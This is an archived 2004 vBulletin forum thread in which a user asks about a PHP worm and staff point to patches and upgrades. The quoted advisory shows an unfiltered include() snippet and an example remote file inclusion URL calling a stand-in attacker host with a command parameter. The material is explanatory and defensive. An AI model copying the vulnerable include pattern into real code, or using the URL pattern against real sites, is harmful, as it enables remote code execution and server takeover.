vb.org Archive

vb.org Archive (https://vborg.vbsupport.ru/index.php)
-   vB3 General Discussions (https://vborg.vbsupport.ru/forumdisplay.php?f=111)
-   -   PHP worm? (https://vborg.vbsupport.ru/showthread.php?t=73488)

Mouse 12-29-2004 11:56 PM

PHP worm?
 
I was informed by my host there is a PHP worm out there...do you have an update or is Vbulltein alrwady secure for it? I run version 2.3.0
this is a copy of the email I got..any help would be appreicated.

There is a worm using Google to look for insecure PHP pages. The worm will exploit the PHP pages and take over your site ranging from web site defacement to deletion of files. The problem relates to insecure PHP coding using the followng items:

include()
require()
mail()
upload

---------

From the article:

The new worm PhpInclude.Worm is currently propagated on Internet, it attacks any nonprotected dynamic page. [ This worm is detected by certain antivirus as being an alternative of Santy. We estimate that this worm is completely different from the Santy family, we thus decided to allot alias generic "the PhpInclude.Worm to him" ].

Contrary to Santy, PhpInclude.Worm does not exploit the vulnerabilities phpBB, it exploits a broader pallet of faults known as "of programming". It seeks (via Google/Yahoo/AOL) Web servers whose php pages use the functions "include()" and" require()"in a not-protected way. How?

These functions are normally used by the programmers in order to include Web pages specified in arguments. Unfortunately, nonthe checking of these arguments can allow the inclusion and the execution of external files, and thus the compromising of the Web server:

Example: vulnerable.php
if(isset($page))
{
include($page);
}
-----------------------------------------------

The page above correctly does not filter the variable $$page, it thus allows inclusion then the execution of distant arbitrary scripts:

vulnerable.php?page=http://server_pirate/scriptmalicieux?cmd=commandes_malicieuses

PhpInclude.Worm thus seeks pages of the type "* php?*=", then tries to insert various orders there allowing the installation of robots IRC and the constitution of an army of machines zombies.

--

Steve Machol 12-30-2004 02:02 AM

Please read this important announcement about a security issue with your version of vB:

http://www.vbulletin.com/forum/showt...180#post694180

It is not related to the PHP worm, but this does need to be patched. I strongly recommend upgrading to at least 2.3.5 ASAP.

Please read this announcement concerning the phpBB worm and your vBulletin forums:

http://www.vbulletin.com/forum/showthread.php?t=124008

boo.3 12-31-2004 10:34 PM

i don't understand why you don't just upgrade to 3.0.3?


All times are GMT. The time now is 04:46 PM.

Powered by vBulletin® Version 3.8.12 by vBS
Copyright ©2000 - 2025, vBulletin Solutions Inc.

X vBulletin 3.8.12 by vBS Debug Information
  • Page Generation 0.01020 seconds
  • Memory Usage 1,716KB
  • Queries Executed 10 (?)
More Information
Template Usage:
  • (1)ad_footer_end
  • (1)ad_footer_start
  • (1)ad_header_end
  • (1)ad_header_logo
  • (1)ad_navbar_below
  • (1)footer
  • (1)gobutton
  • (1)header
  • (1)headinclude
  • (6)option
  • (1)post_thanks_navbar_search
  • (1)printthread
  • (3)printthreadbit
  • (1)spacer_close
  • (1)spacer_open 

Phrase Groups Available:
  • global
  • postbit
  • showthread
Included Files:
  • ./printthread.php
  • ./global.php
  • ./includes/init.php
  • ./includes/class_core.php
  • ./includes/config.php
  • ./includes/functions.php
  • ./includes/class_hook.php
  • ./includes/modsystem_functions.php
  • ./includes/class_bbcode_alt.php
  • ./includes/class_bbcode.php
  • ./includes/functions_bigthree.php 

Hooks Called:
  • init_startup
  • init_startup_session_setup_start
  • init_startup_session_setup_complete
  • cache_permissions
  • fetch_threadinfo_query
  • fetch_threadinfo
  • fetch_foruminfo
  • style_fetch
  • cache_templates
  • global_start
  • parse_templates
  • global_setup_complete
  • printthread_start
  • bbcode_fetch_tags
  • bbcode_create
  • bbcode_parse_start
  • bbcode_parse_complete_precache
  • bbcode_parse_complete
  • printthread_post
  • printthread_complete